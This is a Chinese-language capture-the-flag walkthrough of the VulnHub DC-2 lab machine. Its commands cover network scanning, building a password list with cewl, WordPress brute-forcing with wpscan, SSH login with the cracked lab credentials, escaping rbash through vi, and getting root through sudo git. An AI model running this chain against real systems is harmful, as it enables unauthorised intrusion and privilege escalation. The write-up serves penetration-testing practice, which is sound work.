一、实验环境
靶机(ubuntu):192.168.189.177
攻击机(kali): 192.168.189.148
靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/
二、信息收集
1、利用nmap扫描存活主机
nmap 192.168.189.0/24
2、发现主机192.168.189.177开放了80端口,在对其进行全端口扫描
nmap -p1-65535 192.168.189.177
3、访问其80端口发现不能正常访问到其站点
4、可能是DNS不能解析此域名的原因,我们可以修改hosts文件
windows 中hosts文件目录 C:\Windows\System32\drivers\etc\hosts
linux中hosts文件目录 /etc/hosts linux下hosts文件目录
Hosts文件作用:将一些常用的网址域名与其对应的IP地址建立一个关联“数据库”,当用户在浏览器中输入一个需要登录的网址时,系统会首先自动从hosts文件中去寻找对应的IP地址,一旦找到,系统会立即打开对应网页,如果没有找到,系统则会再将网址提交DNS域名解析服务器进行IP地址解析。
5、成功访问该网站,并拿到flag1
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
标志1:
你通常的词表可能不起作用,所以,也许你只需要成为cewl。
密码越多越好,但有时你不可能赢得所有密码。
以个人身份登录以查看下一个标志。
如果找不到,请以其他用户的身份登录。
三、漏洞利用
1、得到提示cewl,并且我们拿到flag1的同时也发现该网站的指纹信息(wordperss),所以我们可以利用cewl生成密码字典,利用wpscan对wordpress进行用户名密码爆破
(1)利用cewl生成密码字典
cewl -w passwd.txt dc-2
(2)利用wpscan对wordpress进行用户名密码爆破
wpscan --url http://dc-2 -e u -P passwd.txt
2、成功得到两个用户名密码
jerry / adipiscing tom / parturient
使用jerry账号密码登录后台拿到flag2
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
标志2:
如果你不能利用WordPress并走捷径,还有另一种方法。
希望你能找到另一个切入点。
3、根据提示我们并不能利用wordpress的漏洞,但是我们用tom用户登录到wordpress后台时并没有发现任何有用的东西,所以换个思路尝试登录ssh.
但是这里要注意的是我们刚才对目标进行全端口扫描时并没有发现其开放22端口,但是有一个7744端口,我们猜测这里是将ssh端口进行了修改
使用jerry用户登录时发现登录失败
ssh -p 7744 jerry@192.168.189.177
4、利用tom账号成功登录ssh,并在其目录下发现flag3
5、虽然发现flag3.txt文件,但是利用cat,more命令查看不了
6、这里我们使用shell命令受到限制,我们获取一下环境变量和可以使用的命令
echo $PATH
ls /home/tom/usr/bin
7、我们使用vi命令查看flag3
vi flag3.txt
poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
可怜的老汤姆总是追杰瑞。也许他应该为自己造成的压力负责。
四、rbash逃逸
1、虽然查看了flag3,但我们还是不能执行其他shell命令,所以我们需要突破rbash限制
vi flag3.txt
:set shell=/bin/bash
:shell
2、成功突破rbash限制
3、重新给环境变量赋值
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
4、在home目录下发现jerry目录,在jerry目录下发现flag4
cd /jerry
ls
cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
很高兴看到你走了这么远,但你还没回家。
你仍然需要得到最终的旗帜(唯一真正重要的旗帜!!!)。
这里没有提示-你现在只能靠自己了。:-)
走吧,快离开这里!!!!
五、权限提升
1、拿到flag4之后提示我们需要得到最终的旗帜(一般位于root目录下),所以我们需要进行提权。
查看哪些命令有suid 权限
find / -user root -perm -4000 -print 2>/dev/null
2、发现可用使用sudo 命令,sudo -l 查看sudo配置文件
sudo -l
3、这里提示我们用户tom可能无法在DC-2上运行sudo,所以我们登录jerry用户
su jerry
4、继续查看哪些命令有suid 权限
find / -user root -perm -4000 -print 2>/dev/null
5、发现仍然可以使用sudo 命令
sudo -l 查看sudo配置文件
发现提示git是root不用密码可以运行
6、使用git提权
sudo git help config
!/bin/bash
sudo git -p help
!/bin/bash
7、成功提权到root权限,拿到最终flag
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
参考文章:
https://gtfobins.github.io
https://blog.csdn.net/qq_38612882/article/details/122772867
1713
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
